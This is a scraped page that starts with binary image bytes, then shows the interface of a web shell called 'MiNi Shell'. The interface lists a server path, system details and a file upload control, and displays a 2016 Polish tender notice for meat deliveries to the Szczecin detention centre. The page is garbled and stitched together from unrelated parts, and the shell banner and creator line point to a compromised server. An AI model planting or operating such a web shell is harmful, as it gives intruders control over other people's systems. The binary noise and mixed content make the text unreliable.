JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160126/17318-N-2016.html

<p class="kh_header"><b>Szczecin: Dostawa mięsa i wędlin do Aresztu Śledczego w Szczecinie.</b><br>
<b>Numer ogłoszenia: 17318 - 2016; data zamieszczenia: 26.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kaszubska 28, 70-952 Szczecin, woj. zachodniopomorskie, tel. 91 4809100, 4809151, 52, faks 91 4809260.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna więziennictwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mięsa i wędlin do Aresztu Śledczego w Szczecinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa mięsa i wędlin do Aresztu Śledczego w Szczecinie.

Pakiet I:
Mięso i wędliny drobiowe:

Lp.
Przedmiot zamówienia
j.m.
Ilość
Kod CPV
Polska norma
1
2
3
4
5
6
1
Mięso mielone drobiowe (świeże, garmażeryjne, pakowane w opakowania foliowe hermetycznie zamknięte)
kg
1300
15112220-4
PN-A-82011
2
Korpusy drobiowe (świeże)
kg
500
15112210-1
PN-92/A-86524
3
Kurczak udko małe, ze skórą (część uda bez pałki, świeże)
kg
800
15112210-1
PN-92/A-86524
4
Kurczak piersi bez skóry (element tuszki kurczaka obejmujący mięsień piersiowo powierzchniowy bez kości, świeży)
kg
600
15112210-1
PN-92/A-86524
5
Mięso gulaszowe drobiowe (świeże mięso krojone w kostkę o wymiarach min. 3 cm x 3 cm, bez kości)
kg
1300
15112200-8
PN-92/A-86524
6
Kurczak cały (świeży)
kg
800
15112210-1
PN-92/A-86524
7
Wątróbki drobiowe (świeże)
kg
300
15112300-9
PN-92/A-86521
8
Żołądki drobiowe (świeże)
kg
300
15112300-9
PN-92/A-86521
9
Ćwiartka z kurczaka wędzona parzona
kg
200
15131135-0
PN-A-86526
10
Kiełbasa kanapkowa drobiowa (średnio rozdrobniona, bez widocznych oznak tłuszczu, osłonka z jelita cienkiego lub sztuczna, z widocznymi na przekroju drobnymi kawałkami mięsa)
kg
400
15131135-0
PN-A-86526
11
Kiełbasa mazurska z indyka (średnio rozdrobniona, osłonka z jelita cienkiego, z widocznymi na przekroju drobnymi kawałkami mięsa, wyczuwalny smak mięsa i przypraw)
kg
900
15131135-0
PN-A-86526
12
Serdelki drobiowe (homogenizowane, osłonka z folii, bez widocznych oznak tłuszczu, lekko wyczuwalny smak przypraw, wyczuwalny smak mięsa drobiowego)
kg
1000
15131135-0
PN-A-86526
13
Parówki z kurczaka (homogenizowane, osłonka z jelita cienkiego, bez widocznych oznak tłuszczu, lekko wyczuwalny smak przypraw, wyczuwalny smak mięsa drobiowego)
kg
1000
15131135-0
PN-A-86526
14
Pieczeń drobiowa (wyrób w postaci bloku, zapieczony, średnio tłusty)
kg
1300
15131135-0
PN-A-86526
15
Kiełbasa szynkowa z indyka (bez widocznych oznak tłuszczu, na przekroju widoczne grube kawałki chudego mięsa drobiowego, wyczuwalny smak mięsa drobiowego)
kg
400
15131135-0
PN-A-86526
16
Kiełbasa mortadela drobiowa  (homogenizowana, bez widocznych oznak tłuszczu, lekko wyczuwalny smak przypraw, wyczuwalny smak mięsa drobiowego)
kg
1100
15131135-0
PN-A-86526
17
Mielonka drobiowa (średniorozdrobniona, wyczuwalny smak mięsa drobiowego)
kg
2100
15131135-0
PN-A-86526
18
Polędwica z indyka (bez widocznych oznak tłuszczu, na przekroju w przewadze widoczne grube kawałki chudego mięsa drobiowego, wyczuwalny smak mięsa drobiowego)
kg
400
15131135-0
PN-A-86526
19
Pasztet z indyka (wyrób w osłonce sztucznej lub jelitowej, średnio tłusta, w kształcie batoników po ok. 200g)
kg
400
15131310-1
PN-A-86526
20
Kiełbasa lisiecka drobiowa (grubo rozdrobniona, osłonka jelitowa, z widocznymi na przekroju kawałkami mięsa, wyczuwalny smak mięsa drobiowego
kg
200
15131135-0
PN-A-86526
21
Kiełbasa dobra drobiowa (grubo rozdrobniona, osłonka jelitowa, z widocznymi na przekroju kawałkami mięsa)
kg
200
15131135-0
PN-A-86526
22
Delicja z warzywami (wyrób drobiowy w osłonce sztucznej, na przekroju mozaika warzyw w mięsnym farszu)
kg
800
15131135-0
PN-A-86526
23
Kiełbasa rodzinna drobiowa (średnio rozdrobniona, wyrób - baton - parzony, w osłonce sztucznej)
kg
200
15131135-0
PN-A-86526
24
Blok szynkowy drobiowy (bez widocznych oznak tłuszczu, na przekroju widoczne grube kawałki chudego mięsa drobiowego, wyczuwalny smak mięsa drobiowego
kg
300
15131135-0
PN-A-86526
25
Kiełbasa familijna drobiowa (homogenizowana, bez widocznych oznak tłuszczu, wyczuwalny smak przypraw, wyczuwalny smak mięsa)
kg
500
15131135-0
PN-A-86526
26
Przysmak koperkowy (średnio rozdrobniony wyrób parzony z dodatkiem kopru, osłonka sztuczna)
kg
1100
15131135-0
PN-A-86526

Pakiet II:
Mięso i wędliny wieprzowe:

Lp.
Przedmiot zamówienia
j.m.
Ilość
Kod CPV
Polska norma
1
2
3
4
5
6
1
Mięso mielone wieprzowo - wołowe (świeże, garmażeryjne, pakowane w opakowania foliowe hermetycznie zamknięte)
kg
1500
15113000-3
PN-A-82011
2
Karkówka wieprzowa (bez kości świeża)
kg
100
15113000-3
PN-86-A-82002
3
Mięso gulaszowe wieprzowe (świeże mięso krojone w kostkę o wymiarach min. 3 cm x 3 cm, bez kości)
kg
700
15113000-3
PN-86-A-82002
4
Mięso wieprzowe schab (bez kości, świeże)
kg
600
15113000-3
PN-86-A-82002
5
Kości spożywcze (wieprzowe, świeże)
kg
1200
15100000-9
PN-76-A-85712
6
Żeberka wieprzowe (paski, świeże)
kg
400
15113000-3
PN-86-A-82002
7
Kości wędzone spożywcze (wieprzowe)
kg
700
15131200-7
PN-A--82007
8
Szynka wieprzowa bez kości (świeża)
kg
300
15113000-3
PN-86-A-82002
9
Mięso wieprzowe łopatka (bez kości świeże)
kg
300
15113000-3
PN-86-A-82002
10
Smalec
kg
700
15412100-0
PN-90-A-85802
11
Słonina wieprzowa (świeża)
kg
100
15412100-0
PN-86-A-82002
12
Wątroba wieprzowa (świeża)
kg
300
15114000-0
PN-86-A-82002
13
Kaszanka (z kaszy gryczanej lub jęczmiennej, w sztucznej osłonce lub naturalnym jelicie, świeża)
kg
400
15131134-3
PN-86-A-82004
14
Ozory wieprzowe (świeże)
kg
200
15114000-0
PN-86-A-82004
15
Serca wieprzowe (świeże)
kg
200
15114000-0
PN-86-A-82004
16
Salceson włoski (biały, wyrób podrobowy, z widocznymi kawałkami mięsa)
kg
300
15131134-3
PN-86-A-82004
17
Kiełbasa wolińska (średnio rozdrobniona, w osłonce naturalnej, z widocznymi na przekroju drobnymi kawałkami mięsa)
kg
1600
15131130-5
PN-A-82007
18
Kiełbasa zwyczajna (średnio rozdrobniona, bez widocznych oznak tłuszczu, wyczuwalny smak i zapach mięsa i przypraw
kg
6000
15131130-5
PN-A-82007
19
Kiełbasa parówkowa (homogenizowana, wieprzowa, osłonka z jelita cienkiego, średnio tłusta)
kg
700
15131130-5
PN-A-82007
20
Kiełbasa mortadela z dodatkami typu papryka, pieczarki (homogenizowana, bez widocznych oznak tłuszczu, wyczuwalny smak przypraw, wyczuwalny smak mięsa)
kg
900
15131130-5
PN-A-82007
21
Metka cebulowa (wyrób w osłonce sztucznej, w kształcie batoników po ok. 200g)
kg
300
15131130-5
PN-A-82007
22
Mielonka tyrolska (średnio rozdrobniona, lekko widoczne oznaki tłuszczu, wyczuwalny smak mięsa)
kg
1400
15131130-5
PN-A-82007
23
Kiełbasa wiejska (średnio rozdrobniona, z widocznymi na przekroju średnimi kawałkami mięsa, lekko wuczuwalny smak przypraw)
kg
900
15131130-5
PN-A-82007
24
Kiełbasa biała parzona (średnio rozdrobniona, w osłonce naturalnej)
kg
600
15131130-5
PN-A-82007
25
Kiełbasa tatrzańska (średnio rozdrobniona, osłonka z jelita cienkiego, z widocznymi na przekroju drobnymi kawałkami mięsa)
kg
800
15131130-5
PN-A-82007
26
Kiełbasa podwawelska (średnio rozdrobniona, podsuszana, z widocznymi na przekroju średnimi kawałkami mięsa, lekko wyczuwalny smak przypraw)
kg
400
15131130-5
PN-A-82007
27
Kiełbasa zielonogórska (średnio rozdrobniona, osłonka z jelita cienkiego lub sztuczna, z widocznymi na przekroju drobnymi kawałkami mięsa)
kg
1300
15131130-5
PN-A-82007
28
Parówki śląskie (homogenizowane, osłonka z folii, bez widocznych oznak tłuszczu, lekko wyczuwalny smak mięsa)
kg
1100
15131130-5
PN-A-82007
29
Kiełbasa toruńska (średnio rozdrobniona, osłonka z jelita cienkiego, z widocznymi na przekroju drobnymi kawałkami mięsa)
kg
900
15131130-5
PN-A-82007
30
Kiełbasa serdelowa (homogenizowana, bez widocznych oznak tłuszczu, wyczuwalny smak przypraw, wyczuwalny smak mięsa)
kg
400
15131130-5
PN-A-82007
31
Kiełbasa serwolatka (homogenizowana, bez widocznych oznak tłuszczu, wyczuwalny smka przypraw, wyczuwalny smak mięsa)
kg
600
15131130-5
PN-A-82007
32
Kiełbasa rawska (grubo rozdrobniona, osłonka jelitowa, z widocznymi na przekroju kawałkami mięsa)
kg
300
15131130-5
PN-A-82007
33
Pieczeń rzymska (wyrób w postaci bloku, zapieczony, średnio tłusty)
kg
700
15131130-5
PN-A-82007
34
Boczek surowy świeży
kg
200
15412100-0
PN-86-A-82002.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.11.22.20-4, 15.11.30.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena warunków będzie odbywać się metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena warunków będzie odbywać się metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena warunków będzie odbywać się metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena warunków będzie odbywać się metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena warunków będzie odbywać się metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania istotnych zmian w umowie w stosunku do treści oferty. Taka zmiana może być dokonana w granicach wyznaczonych przepisami art. 144 Ustawy, wyłącznie za zgodą stron, w formie pisemnej, pod rygorem nieważności. 
2. Istotne zmiany umowy mogą nastąpić wyłącznie w przypadku zmiany obowiązujących przepisów w zakresie podatku od towarów i usług - w przypadku zmiany wartości podatku VAT ulegnie zmianie cena brutto (o zmienioną wartość podatku).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziby Zamawiającego:
Areszt Śledczy
ul. Kaszubks a28
70-226 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2016 godzina 10:00, miejsce: Areszt Śledczy
ul. Kaszubska 28
70-226 Szczecin
sekretariat - pokój 107.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com